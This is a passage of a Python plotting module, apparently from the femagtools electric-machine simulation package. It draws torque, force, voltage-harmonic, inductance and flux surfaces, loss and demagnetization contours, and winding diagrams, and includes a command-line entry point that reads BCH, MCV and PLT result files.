        plt.subplot(rows, cols, row+6)
        try:
            voltage_fft('No Load Voltage Harmonics',
                        bch.flux_fft['1'][0]['order'],
                        bch.flux_fft['1'][0]['voltage'])
        except:
            pass
    fig.tight_layout(h_pad=3.5)
    if title:
        fig.subplots_adjust(top=0.92)


def multcal(bch, title=''):
    """creates a plot of a MULT CAL simulation"""
    cols = 2
    rows = 4
    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    row = 1
    plt.subplot(rows, cols, row)
    if bch.torque:
        torque(bch.torque[-1]['angle'], bch.torque[-1]['torque'])
        plt.subplot(rows, cols, row+1)
        tq = list(bch.torque_fft[-1]['torque'])
        order = list(bch.torque_fft[-1]['order'])
        if order and max(order) < 5:
            order += [15]
            tq += [0]
        torque_fft(order, tq)
        plt.subplot(rows, cols, row+2)
        force('Force Fx',
              bch.torque[-1]['angle'], bch.torque[-1]['force_x'])
        plt.subplot(rows, cols, row+3)
        force('Force Fy',
              bch.torque[-1]['angle'], bch.torque[-1]['force_y'])
        row += 3
    elif bch.linearForce:
        title, keys = __get_linearForce_title_keys(bch.linearForce[-1])
        force(title[0], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[0]], 'Displt. / mm')
        plt.subplot(rows, cols, row+1)
        force_fft(bch.linearForce_fft[-2]['order'],
                  bch.linearForce_fft[-2]['force'])
        plt.subplot(rows, cols, row+2)
        force(title[1], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[1]], 'Displt. / mm')
        plt.subplot(rows, cols, row+3)
        force_fft(bch.linearForce_fft[-1]['order'],
                  bch.linearForce_fft[-1]['force'])
        row += 3

    plt.subplot(rows, cols, row+1)
    flux = [bch.flux[k][-1] for k in bch.flux]
    pos = [f['displ'] for f in flux]
    winding_flux(pos,
                 [f['flux_k'] for f in flux])
    plt.subplot(rows, cols, row+2)
    winding_current(pos,
                    [f['current_k'] for f in flux])
    plt.subplot(rows, cols, row+3)
    voltage('Internal Voltage',
            bch.flux['1'][-1]['displ'],
            bch.flux['1'][-1]['voltage_dpsi'])
    plt.subplot(rows, cols, row+4)
    try:
        voltage_fft('Internal Voltage Harmonics',
                    bch.flux_fft['1'][-1]['order'],
                    bch.flux_fft['1'][-1]['voltage'])
    except:
        pass
    if len(bch.flux['1']) > 1:
        plt.subplot(rows, cols, row+5)
        voltage('No Load Voltage',
                bch.flux['1'][0]['displ'],
                bch.flux['1'][0]['voltage_dpsi'])
        plt.subplot(rows, cols, row+6)
        try:
            voltage_fft('No Load Voltage Harmonics',
                        bch.flux_fft['1'][0]['order'],
                        bch.flux_fft['1'][0]['voltage'])
        except:
            pass
        fig.tight_layout(h_pad=3.5)
    if title:
        fig.subplots_adjust(top=0.92)


def fasttorque(bch, title=''):
    """creates a plot of a Fast Torque simulation"""
    cols = 2
    rows = 4
    if len(bch.flux['1']) > 1:
        rows += 1
    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    row = 1
    plt.subplot(rows, cols, row)
    if bch.torque:
        torque(bch.torque[-1]['angle'], bch.torque[-1]['torque'])
        plt.subplot(rows, cols, row+1)
        torque_fft(bch.torque_fft[-1]['order'], bch.torque_fft[-1]['torque'])
        plt.subplot(rows, cols, row+2)
        force('Force Fx',
              bch.torque[-1]['angle'], bch.torque[-1]['force_x'])
        plt.subplot(rows, cols, row+3)
        force('Force Fy',
              bch.torque[-1]['angle'], bch.torque[-1]['force_y'])
        row += 3
    elif bch.linearForce:
        title, keys = __get_linearForce_title_keys(bch.linearForce[-1])
        force(title[0], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[0]], 'Displt. / mm')
        plt.subplot(rows, cols, row+1)
        force_fft(bch.linearForce_fft[-2]['order'],
                  bch.linearForce_fft[-2]['force'])
        plt.subplot(rows, cols, row+2)
        force(title[1], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[1]], 'Displt. / mm')
        plt.subplot(rows, cols, row+3)
        force_fft(bch.linearForce_fft[-1]['order'],
                  bch.linearForce_fft[-1]['force'])
        row += 3

    plt.subplot(rows, cols, row+1)
    flux = [bch.flux[k][-1] for k in bch.flux]
    pos = [f['displ'] for f in flux]
    winding_flux(pos, [f['flux_k'] for f in flux])
    plt.subplot(rows, cols, row+2)
    winding_current(pos, [f['current_k'] for f in flux])
    plt.subplot(rows, cols, row+3)
    voltage('Internal Voltage',
            bch.flux['1'][-1]['displ'],
            bch.flux['1'][-1]['voltage_dpsi'])
    plt.subplot(rows, cols, row+4)
    try:
        voltage_fft('Internal Voltage Harmonics',
                    bch.flux_fft['1'][-1]['order'],
                    bch.flux_fft['1'][-1]['voltage'])
    except:
        pass
    if len(bch.flux['1']) > 1:
        plt.subplot(rows, cols, row+5)
        voltage('No Load Voltage',
                bch.flux['1'][0]['displ'],
                bch.flux['1'][0]['voltage_dpsi'])
        plt.subplot(rows, cols, row+6)
        try:
            voltage_fft('No Load Voltage Harmonics',
                        bch.flux_fft['1'][0]['order'],
                        bch.flux_fft['1'][0]['voltage'])
        except:
            pass
    fig.tight_layout(h_pad=3.5)
    if title:
        fig.subplots_adjust(top=0.92)


def cogging(bch, title=''):
    """creates a cogging plot"""
    cols = 2
    rows = 3

    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    row = 1
    plt.subplot(rows, cols, row)
    if bch.torque:
        torque(bch.torque[0]['angle'], bch.torque[0]['torque'])
        plt.subplot(rows, cols, row+1)
        if bch.torque_fft:
            torque_fft(bch.torque_fft[0]['order'], bch.torque_fft[0]['torque'])
        plt.subplot(rows, cols, row+2)
        force('Force Fx',
              bch.torque[0]['angle'], bch.torque[0]['force_x'])
        plt.subplot(rows, cols, row+3)
        force('Force Fy',
              bch.torque[0]['angle'], bch.torque[0]['force_y'])
        row += 3
    elif bch.linearForce:
        title, keys = __get_linearForce_title_keys(bch.linearForce[-1])
        force(title[0], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[0]], 'Displt. / mm')
        plt.subplot(rows, cols, row+1)
        force_fft(bch.linearForce_fft[-2]['order'],
                  bch.linearForce_fft[-2]['force'])
        plt.subplot(rows, cols, row+2)
        force(title[1], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[1]], 'Displt. / mm')
        plt.subplot(rows, cols, row+3)
        force_fft(bch.linearForce_fft[-1]['order'],
                  bch.linearForce_fft[-1]['force'])
        row += 3

    plt.subplot(rows, cols, row+1)
    voltage('Voltage',
            bch.flux['1'][0]['displ'],
            bch.flux['1'][0]['voltage_dpsi'])
    plt.subplot(rows, cols, row+2)
    voltage_fft('Voltage Harmonics',
                bch.flux_fft['1'][0]['order'],
                bch.flux_fft['1'][0]['voltage'])

    fig.tight_layout(h_pad=2)
    if title:
        fig.subplots_adjust(top=0.92)


def transientsc(bch, title=''):
    """creates a transient short circuit plot"""
    cols = 1
    rows = 2
    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    row = 1
    plt.subplot(rows, cols, row)
    ax = plt.gca()
    ax.set_title('Currents / A')
    ax.grid(True)
    for i in ('ia', 'ib', 'ic'):
        ax.plot(bch.scData['time'], bch.scData[i], label=i)
    ax.set_xlabel('Time / s')
    ax.legend()

    row = 2
    plt.subplot(rows, cols, row)
    ax = plt.gca()
    ax.set_title('Torque / Nm')
    ax.grid(True)
    ax.plot(bch.scData['time'], bch.scData['torque'])
    ax.set_xlabel('Time / s')

    fig.tight_layout(h_pad=2)
    if title:
        fig.subplots_adjust(top=0.92)


def i1beta_torque(i1, beta, torque, title='', ax=0):
    """creates a surface plot of torque vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    azim = 210
    if 0 < np.mean(beta) or -90 > np.mean(beta):
        azim = -60
    unit = 'Nm'
    scale = 1
    if np.min(torque) < -9.9e3 or np.max(torque) > 9.9e3:
        scale = 1e-3
        unit = 'kNm'
    if title:
        _plot_surface(ax, i1, beta, scale*np.asarray(torque),
                      (u'I1/A', u'Beta/°', title),
                      azim=azim)
    else:
        _plot_surface(ax, i1, beta, scale*np.asarray(torque),
                      (u'I1/A', u'Beta/°', u'Torque/{}'.format(unit)),
                      azim=azim)


def i1beta_ld(i1, beta, ld, ax=0):
    """creates a surface plot of ld vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    _plot_surface(ax, i1, beta, np.asarray(ld)*1e3,
                  (u'I1/A', u'Beta/°', u'Ld/mH'),
                  azim=60)


def i1beta_lq(i1, beta, lq, ax=0):
    """creates a surface plot of ld vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    azim = 60
    if 0 < np.mean(beta) or -90 > np.mean(beta):
        azim = -120
    _plot_surface(ax, i1, beta, np.asarray(lq)*1e3,
                  (u'I1/A', u'Beta/°', u'Lq/mH'),
                  azim=azim)


def i1beta_psim(i1, beta, psim, ax=0):
    """creates a surface plot of psim vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    _plot_surface(ax, i1, beta, psim,
                  (u'I1/A', u'Beta/°', u'Psi m/Vs'),
                  azim=60)


def i1beta_up(i1, beta, up, ax=0):
    """creates a surface plot of up vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    _plot_surface(ax, i1, beta, up,
                  (u'I1/A', u'Beta/°', u'Up/V'),
                  azim=60)


def i1beta_psid(i1, beta, psid, ax=0):
    """creates a surface plot of psid vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    azim = -60
    if 0 < np.mean(beta) or -90 > np.mean(beta):
        azim = 60
    _plot_surface(ax, i1, beta, psid,
                  (u'I1/A', u'Beta/°', u'Psi d/Vs'),
                  azim=azim)


def i1beta_psiq(i1, beta, psiq, ax=0):
    """creates a surface plot of psiq vs i1, beta"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    azim = 210
    if 0 < np.mean(beta) or -90 > np.mean(beta):
        azim = -60
    _plot_surface(ax, i1, beta, psiq,
                  (u'I1/A', u'Beta/°', u'Psi q/Vs'),
                  azim=azim)


def idq_torque(id, iq, torque, ax=0):
    """creates a surface plot of torque vs id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    unit = 'Nm'
    scale = 1
    if np.min(torque) < -9.9e3 or np.max(torque) > 9.9e3:
        scale = 1e-3
        unit = 'kNm'
    _plot_surface(ax, id, iq, scale*np.asarray(torque),
                  (u'Id/A', u'Iq/A', u'Torque/{}'.format(unit)),
                  azim=-60)
    return ax


def idq_psid(id, iq, psid, ax=0):
    """creates a surface plot of psid vs id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    _plot_surface(ax, id, iq, psid,
                  (u'Id/A', u'Iq/A', u'Psi d/Vs'),
                  azim=210)


def idq_psiq(id, iq, psiq, ax=0):
    """creates a surface plot of psiq vs id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    _plot_surface(ax, id, iq, psiq,
                  (u'Id/A', u'Iq/A', u'Psi q/Vs'),
                  azim=210)


def idq_psim(id, iq, psim, ax=0):
    """creates a surface plot of psim vs. id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    _plot_surface(ax, id, iq, psim,
                  (u'Id/A', u'Iq/A', u'Psi m [Vs]'),
                  azim=120)


def idq_ld(id, iq, ld, ax=0):
    """creates a surface plot of ld vs. id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    _plot_surface(ax, id, iq, np.asarray(ld)*1e3,
                  (u'Id/A', u'Iq/A', u'L d/mH'),
                  azim=120)


def idq_lq(id, iq, lq, ax=0):
    """creates a surface plot of lq vs. id, iq"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    _plot_surface(ax, id, iq, np.asarray(lq)*1e3,
                  (u'Id/A', u'Iq/A', u'L q/mH'),
                  azim=120)


def ldlq(bch):
    """creates the surface plots of a BCH reader object
    with a ld-lq identification"""
    beta = bch.ldq['beta']
    i1 = bch.ldq['i1']
    torque = bch.ldq['torque']
    ld = np.array(bch.ldq['ld'])
    lq = np.array(bch.ldq['lq'])
    psid = bch.ldq['psid']
    psiq = bch.ldq['psiq']

    rows = 3
    fig = plt.figure(figsize=(10, 4*rows))
    fig.suptitle('Ld-Lq Identification {}'.format(bch.filename), fontsize=16)
    fig.add_subplot(rows, 2, 1, projection='3d')
    i1beta_torque(i1, beta, torque)

    fig.add_subplot(rows, 2, 2, projection='3d')
    i1beta_psid(i1, beta, psid)

    fig.add_subplot(rows, 2, 3, projection='3d')
    i1beta_psiq(i1, beta, psiq)

    fig.add_subplot(rows, 2, 4, projection='3d')
    try:
        i1beta_psim(i1, beta, bch.ldq['psim'])
    except:
        i1beta_up(i1, beta, bch.ldq['up'])

    fig.add_subplot(rows, 2, 5, projection='3d')
    i1beta_ld(i1, beta, ld)

    fig.add_subplot(rows, 2, 6, projection='3d')
    i1beta_lq(i1, beta, lq)


def psidq(bch):
    """creates the surface plots of a BCH reader object
    with a psid-psiq identification"""
    id = bch.psidq['id']
    iq = bch.psidq['iq']
    torque = bch.psidq['torque']
    ld = np.array(bch.psidq_ldq['ld'])
    lq = np.array(bch.psidq_ldq['lq'])
    psim = bch.psidq_ldq['psim']
    psid = bch.psidq['psid']
    psiq = bch.psidq['psiq']

    rows = 3
    fig = plt.figure(figsize=(10, 4*rows))
    fig.suptitle('Psid-Psiq Identification {}'.format(
        bch.filename), fontsize=16)

    fig.add_subplot(rows, 2, 1, projection='3d')
    idq_torque(id, iq, torque)

    fig.add_subplot(rows, 2, 2, projection='3d')
    idq_psid(id, iq, psid)

    fig.add_subplot(rows, 2, 3, projection='3d')
    idq_psiq(id, iq, psiq)

    fig.add_subplot(rows, 2, 4, projection='3d')
    idq_psim(id, iq, psim)

    fig.add_subplot(rows, 2, 5, projection='3d')
    idq_ld(id, iq, ld)

    fig.add_subplot(rows, 2, 6, projection='3d')
    idq_lq(id, iq, lq)


def felosses(losses, coeffs, title='', log=True, ax=0):
    """plot iron losses with steinmetz or jordan approximation
    Args:
      losses: dict with f, B, pfe values
      coeffs: list with steinmetz (cw, alpha, beta) or
              jordan (cw, alpha, ch, beta, gamma) coeffs
      title: title string
      log: log scale for x and y axes if True

    """
    import femagtools.losscoeffs as lc
    if ax == 0:
        ax = plt.gca()

    fo = losses['fo']
    Bo = losses['Bo']
    B = plt.np.linspace(0.9*np.min(losses['B']),
                        1.1*0.9*np.max(losses['B']))

    for i, f in enumerate(losses['f']):
        pfe = [p for p in np.array(losses['pfe'])[i] if p]
        if f > 0:
            if len(coeffs) == 5:
                ax.plot(B, lc.pfe_jordan(f, B, *coeffs, fo=fo, Bo=Bo))
            elif len(coeffs) == 3:
                ax.plot(B, lc.pfe_steinmetz(f, B, *coeffs, fo=fo, Bo=Bo))
        plt.plot(losses['B'][:len(pfe)], pfe,
                 marker='o', label="{} Hz".format(f))

    ax.set_title("Fe Losses/(W/kg) " + title)
    if log:
        ax.set_yscale('log')
        ax.set_xscale('log')
    ax.set_xlabel("Flux Density [T]")
    # plt.ylabel("Pfe [W/kg]")
    ax.legend()
    ax.grid(True)


def spel(isa, with_axis=False, ax=0):
    """plot super elements of I7/ISA7 model
    Args:
      isa: Isa7 object
    """
    from matplotlib.patches import Polygon
    if ax == 0:
        ax = plt.gca()
    ax.set_aspect('equal')
    for se in isa.superelements:
        ax.add_patch(Polygon([n.xy
                              for nc in se.nodechains
                              for n in nc.nodes],
                             color=isa.color[se.color], lw=0))

    ax.autoscale(enable=True)
    if not with_axis:
        ax.axis('off')


def mesh(isa, with_axis=False, ax=0):
    """plot mesh of I7/ISA7 model
    Args:
      isa: Isa7 object
    """
    from matplotlib.lines import Line2D
    if ax == 0:
        ax = plt.gca()
    ax.set_aspect('equal')
    for el in isa.elements:
        pts = [list(i) for i in zip(*[v.xy for v in el.vertices])]
        ax.add_line(Line2D(pts[0], pts[1], color='b', ls='-', lw=0.25))

    # for nc in isa.nodechains:
    #    pts = [list(i) for i in zip(*[(n.x, n.y) for n in nc.nodes])]
    #    ax.add_line(Line2D(pts[0], pts[1], color="b", ls="-", lw=0.25,
    #                       marker=".", ms="2", mec="None"))

    # for nc in isa.nodechains:
    #    if nc.nodemid is not None:
    #        plt.plot(*nc.nodemid.xy, "rx")

    ax.autoscale(enable=True)
    if not with_axis:
        ax.axis('off')


def _contour(ax, title, elements, values, label='', isa=None):
    from matplotlib.patches import Polygon
    from matplotlib.collections import PatchCollection
    if ax == 0:
        ax = plt.gca()
    ax.set_aspect('equal')
    ax.set_title(title, fontsize=18)
    if isa:
        for se in isa.superelements:
            ax.add_patch(Polygon([n.xy
                                  for nc in se.nodechains
                                  for n in nc.nodes],
                                 color='gray', alpha=0.1, lw=0))
    valid_values = np.logical_not(np.isnan(values))
    patches = np.array([Polygon([v.xy for v in e.vertices])
                       for e in elements])[valid_values]
    # , cmap=matplotlib.cm.jet, alpha=0.4)
    p = PatchCollection(patches, alpha=1.0, match_original=False)
    p.set_array(np.asarray(values)[valid_values])
    ax.add_collection(p)
    cb = plt.colorbar(p)
    for patch in np.array([Polygon([v.xy for v in e.vertices],
                                   fc='white', alpha=1.0)
                           for e in elements])[np.isnan(values)]:
        ax.add_patch(patch)
    if label:
        cb.set_label(label=label, fontsize=18)
    ax.autoscale(enable=True)
    ax.axis('off')


def demag(isa, ax=0):
    """plot demag of NC/I7/ISA7 model
    Args:
      isa: Isa7/NC object
    """
    emag = [e for e in isa.elements if e.is_magnet()]
    demag = np.array([e.demagnetization(isa.MAGN_TEMPERATURE) for e in emag])
    _contour(ax, f'Demagnetization at {isa.MAGN_TEMPERATURE} °C',
             emag, demag, '-H / kA/m', isa)
    logger.info("Max demagnetization %f", np.max(demag))


def demag_pos(isa, pos, icur=-1, ibeta=-1, ax=0):
    """plot demag of NC/I7/ISA7 model at rotor position
    Args:
      isa: Isa7/NC object
      pos: rotor position in degree
      icur: cur amplitude index or last index if -1
      ibeta: beta angle index or last index if -1
    """
    emag = [e for e in isa.elements if e.is_magnet()]
    demag = np.array([isa.demagnetization(e, icur, ibeta)[1]
                     for e in emag])
    for i, x in enumerate(isa.pos_el_fe_induction):
        if x >= pos/180*np.pi:
            break

    hpol = demag[:, i]
    hpol[hpol == 0] = np.nan
    _contour(ax, f'Demagnetization at Pos. {round(x/np.pi*180)}° ({isa.MAGN_TEMPERATURE} °C)',
             emag, hpol, '-H / kA/m', isa)
    logger.info("Max demagnetization %f kA/m", np.nanmax(hpol))


def flux_density(isa, subreg=[], ax=0):
    """plot flux density of NC/I7/ISA7 model
    Args:
      isa: Isa7/NC object
    """
    if subreg:
        if isinstance(subreg, list):
            sr = subreg
        else:
            sr = [subreg]
        elements = [e for s in sr for se in isa.get_subregion(s).elements()
                    for e in se]
    else:
        elements = [e for e in isa.elements]

    fluxd = np.array([np.linalg.norm(e.flux_density()) for e in elements])
    _contour(ax, f'Flux Density T', elements, fluxd)
    logger.info("Max flux dens %f", np.max(fluxd))


def loss_density(isa, subreg=[], ax=0):
    """plot loss density of NC/I7/ISA7 model
    Args:
      isa: Isa7/NC object
    """
    if subreg:
        if isinstance(subreg, list):
            sr = subreg
        else:
            sr = [subreg]
        elements = [e for s in sr for sre in isa.get_subregion(s).elements()
                    for e in sre]
    else:
        elements = [e for e in isa.elements]

    lossd = np.array([e.loss_density*1e-3 for e in elements])
    _contour(ax, 'Loss Density kW/m³', elements, lossd)


def mmf(f, title='', ax=0):
    """plot magnetomotive force (mmf) of winding"""
    if ax == 0:
        ax = plt.gca()
    if title:
        ax.set_title(title)
    ax.plot(np.array(f['pos'])/np.pi*180, f['mmf'])
    ax.plot(np.array(f['pos_fft'])/np.pi*180, f['mmf_fft'])
    ax.set_xlabel('Position / Deg')

    phi = [f['alfa0']/np.pi*180, f['alfa0']/np.pi*180]
    y = [min(f['mmf_fft']), 1.1*max(f['mmf_fft'])]
    ax.plot(phi, y, '--')
    alfa0 = round(f['alfa0']/np.pi*180, 3)
    ax.text(phi[0]/2, y[0]+0.05, f"{alfa0}°",
            ha="center", va="bottom")
    ax.annotate(f"", xy=(phi[0], y[0]),
                xytext=(0, y[0]), arrowprops=dict(arrowstyle="->"))
    ax.grid()


def mmf_fft(f, title='', mmfmin=1e-2, ax=0):
    """plot winding mmf harmonics"""
    if ax == 0:
        ax = plt.gca()
    if title:
        ax.set_title(title)
    else:
        ax.set_title('MMF Harmonics')
    ax.grid(True)
    order, mmf = np.array([(n, m) for n, m in zip(f['nue'],
                                                  f['mmf_nue']) if m > mmfmin]).T
    try:
        markerline1, stemlines1, _ = ax.stem(order, mmf, '-.', basefmt=" ",
                                             use_line_collection=True)
        ax.set_xticks(order)
    except ValueError:  # empty sequence
        pass


def zoneplan(wdg, ax=0):
    """plot zone plan of winding wdg"""
    from matplotlib.patches import Rectangle
    upper, lower = wdg.zoneplan()
    Qb = len([n for l in upper for n in l])
    from femagtools.windings import coil_color
    rh = 0.5
    if lower:
        yl = rh
        ymax = 2*rh + 0.2
    else:
        yl = 0
        ymax = rh + 0.2
    if ax == 0:
        ax = plt.gca()
    ax.axis('off')
    ax.set_xlim([-0.5, Qb-0.5])
    ax.set_ylim([0, ymax])
    ax.set_aspect(Qb/6+0.3)

    for i, p in enumerate(upper):
        for x in p:
            ax.add_patch(Rectangle((abs(x)-1.5, yl), 1, rh,
                                   facecolor=coil_color[i],
                                   edgecolor='white', fill=True))
            s = f'+{i+1}' if x > 0 else f'-{i+1}'
            ax.text(abs(x)-1, yl+rh/2, s, color='black',
                    ha="center", va="center")
    for i, p in enumerate(lower):
        for x in p:
            ax.add_patch(Rectangle((abs(x)-1.5, yl-rh), 1, rh,
                                   facecolor=coil_color[i],
                                   edgecolor='white', fill=True))
            s = f'+{i+1}' if x > 0 else f'-{i+1}'
            ax.text(abs(x)-1, yl-rh/2, s, color='black',
                    ha="center", va="center")

    yu = yl+rh
    step = 1 if Qb < 25 else 2
    if lower:
        yl -= rh
    margin = 0.05
    ax.text(-0.5, yu+margin, f'Q={wdg.Q}, p={wdg.p}, q={round(wdg.q,4)}',
            ha='left', va='bottom', size=15)
    for i in range(0, Qb, step):
        ax.text(i, yl-margin, f'{i+1}', ha="center", va="top")


def winding_factors(wdg, n=8, ax=0):
    """plot winding factors"""
    ax = plt.gca()
    ax.set_title(f'Winding factors Q={wdg.Q}, p={wdg.p}, q={round(wdg.q,4)}')
    ax.grid(True)
    order, kwp, kwd, kw = np.array([(n, k1, k2, k3)
                                    for n, k1, k2, k3 in zip(wdg.kw_order(n),
                                                             wdg.kwp(n),
                                                             wdg.kwd(n),
                                                             wdg.kw(n))]).T
    try:
        markerline1, stemlines1, _ = ax.stem(order-1, kwp, 'C1:', basefmt=" ",
                                             markerfmt='C1.',
                                             use_line_collection=True, label='Pitch')
        markerline2, stemlines2, _ = ax.stem(order+1, kwd, 'C2:', basefmt=" ",
                                             markerfmt='C2.',
                                             use_line_collection=True, label='Distribution')
        markerline3, stemlines3, _ = ax.stem(order, kw, 'C0-', basefmt=" ",
                                             markerfmt='C0o',
                                             use_line_collection=True, label='Total')
        ax.set_xticks(order)
        ax.legend()
    except ValueError:  # empty sequence
        pass


def winding(wdg, ax=0):
    """plot coils of windings wdg"""
    from matplotlib.patches import Rectangle
    from matplotlib.lines import Line2D
    from femagtools.windings import coil_color

    coil_len = 25
    coil_height = 4
    dslot = 8
    arrow_head_length = 2
    arrow_head_width = 2

    if ax == 0:
        ax = plt.gca()
    z = wdg.zoneplan()
    xoff = 0
    if z[-1]:
        xoff = 0.75
    yd = dslot*wdg.yd
    mh = 2*coil_height/yd
    slots = sorted([abs(n) for m in z[0] for n in m])
    smax = slots[-1]*dslot
    for n in slots:
        x = n*dslot
        ax.add_patch(Rectangle((x + dslot/4, 1), dslot /
                     2, coil_len - 2, fc="lightblue"))
        ax.text(x, coil_len / 2,
                str(n),
                horizontalalignment="center",
                verticalalignment="center",
                backgroundcolor="white",
                bbox=dict(boxstyle='circle,pad=0', fc="white", lw=0))
    line_thickness = [0.6, 1.2]
    for i, layer in enumerate(z):
        b = -xoff if i else xoff
        lw = line_thickness[i]
        for m, mslots in enumerate(layer):
            for k in mslots:
                x = abs(k) * dslot + b
                xpoints = []
                ypoints = []
                if (i == 0 and (k > 0 or (k < 0 and wdg.l > 1))):
                    # first layer, positive dir or neg. dir and 2-layers:
                    #   from right bottom
                    if x + yd > smax+b:
                        dx = dslot if yd > dslot else yd/4
                        xpoints = [x + yd//2 + dx - xoff]
                        ypoints = [-coil_height + mh*dx]
                    xpoints += [x + yd//2 - xoff, x, x, x + yd//2-xoff]
                    ypoints += [-coil_height, 0, coil_len,
                                coil_len+coil_height]
                    if x + yd > smax+b:
                        xpoints += [x + yd//2 + dx - xoff]
                        ypoints += [coil_len+coil_height - mh*dx]
                else:
                    # from left bottom
                    if x - yd < 0:  # and x - yd/2 > -3*dslot:
                        dx = dslot if yd > dslot else yd/4
                        xpoints = [x - yd//2 - dx + xoff]
                        ypoints = [- coil_height + mh*dx]
                    xpoints += [x - yd//2+xoff, x, x, x - yd/2+xoff]
                    ypoints += [-coil_height, 0, coil_len,
                                coil_len+coil_height]
                    if x - yd < 0:  # and x - yd > -3*dslot:
                        xpoints += [x - yd//2 - dx + xoff]
                        ypoints += [coil_len + coil_height - mh*dx]

                ax.add_line(Line2D(xpoints, ypoints,
                            color=coil_color[m], lw=lw))

                if k > 0:
                    h = arrow_head_length
                    y = coil_len * 0.8
                else:
                    h = -arrow_head_length
                    y = coil_len * 0.2
                ax.arrow(x, y, 0, h,
                         length_includes_head=True,
                         head_starts_at_zero=False,
                         head_length=arrow_head_length,
                         head_width=arrow_head_width,
                         fc=coil_color[m], lw=0)
    if False:  # TODO show winding connections
        m = 0
        for k in [n*wdg.Q/wdg.p/wdg.m + 1 for n in range(wdg.m)]:
            if k < len(slots):
                x = k * dslot + b + yd/2 - xoff
                ax.add_line(Line2D([x, x],
                                   [-2*coil_height, -coil_height],
                                   color=coil_color[m], lw=lw))
                ax.text(x, -2*coil_height+0.5, str(m+1), color=coil_color[m])
            m += 1
    ax.autoscale(enable=True)
    ax.set_axis_off()


def main():
    import io
    import sys
    import argparse
    from .__init__ import __version__
    from femagtools.bch import Reader

    argparser = argparse.ArgumentParser(
        description='Read BCH/BATCH/PLT file and create a plot')
    argparser.add_argument('filename',
                           help='name of BCH/BATCH/PLT file')
    argparser.add_argument(
        "--version",
        "-v",
        action="version",
        version="%(prog)s {}, Python {}".format(__version__, sys.version),
        help="display version information",
    )
    args = argparser.parse_args()
    if not matplotlibversion:
        sys.exit(0)
    if not args.filename:
        sys.exit(0)

    ext = args.filename.split('.')[-1].upper()
    if ext.startswith('MC'):
        import femagtools.mcv
        mcv = femagtools.mcv.read(sys.argv[1])

        if mcv['mc1_type'] in (femagtools.mcv.MAGCRV, femagtools.mcv.ORIENT_CRV):
            ncols = 2
        else:  # Permanent Magnet
            ncols = 1

        fig, ax = plt.subplots(nrows=1, ncols=ncols, figsize=(10, 6))
        if ncols > 1:
            plt.subplot(1, 2, 1)
            mcv_hbj(mcv)
            plt.subplot(1, 2, 2)
            mcv_muer(mcv)
        else:
            mcv_hbj(mcv, log=False)

        fig.tight_layout()
        fig.subplots_adjust(top=0.94)
        plt.show()
        return

    if ext.startswith('PLT'):
        import femagtools.forcedens
        fdens = femagtools.forcedens.read(args.filename)
        cols = 1
        rows = 2
        fig, ax = plt.subplots(nrows=rows, ncols=cols,
                               figsize=(10, 10*rows))
        title = '{}, Rotor position {}'.format(
            fdens.title, fdens.positions[0]['position'])
        pos = fdens.positions[0]['X']
        FT_FN = (fdens.positions[0]['FT'],
                 fdens.positions[0]['FN'])
        plt.subplot(rows, cols, 1)
        forcedens(title, pos, FT_FN)

        title = 'Force Density Harmonics'
        plt.subplot(rows, cols, 2)
        forcedens_fft(title, fdens)

        # fig.tight_layout(h_pad=3.5)
        # if title:
        #    fig.subplots_adjust(top=0.92)
        plt.show()
        return

    bchresults = Reader()
    with io.open(args.filename, encoding='latin1', errors='ignore') as f:
        bchresults.read(f.readlines())

    if (bchresults.type.lower().find(
        'pm-synchronous-motor simulation') >= 0 or
        bchresults.type.lower().find(
            'permanet-magnet-synchronous-motor') >= 0 or
        bchresults.type.lower().find(
            'simulation pm/universal-motor') >= 0):
        pmrelsim(bchresults, bchresults.filename)
    elif bchresults.type.lower().find(
            'multiple calculation of forces and flux') >= 0:
        multcal(bchresults, bchresults.filename)
    elif bchresults.type.lower().find('cogging calculation') >= 0:
        cogging(bchresults, bchresults.filename)
    elif bchresults.type.lower().find('ld-lq-identification') >= 0:
        ldlq(bchresults)
    elif bchresults.type.lower().find('psid-psiq-identification') >= 0:
        psidq(bchresults)
    elif bchresults.type.lower().find('fast_torque calculation') >= 0:
        fasttorque(bchresults)
    elif bchresults.type.lower().find('transient sc') >= 0:
        transientsc(bchresults, bchresults.filename)
    else:
        raise ValueError("BCH type {} not yet supported".format(
            bchresults.type))
    plt.show()


def characteristics(char, title=''):
    fig, axs = plt.subplots(2, 2, figsize=(10, 8), sharex=True)
    if title:
        fig.suptitle(title)

    n = np.array(char['n'])*60
    pmech = np.array(char['pmech'])*1e-3

    axs[0, 0].plot(n, np.array(char['T']), 'C0-', label='Torque')
    axs[0, 0].set_ylabel("Torque / Nm")
    axs[0, 0].grid()
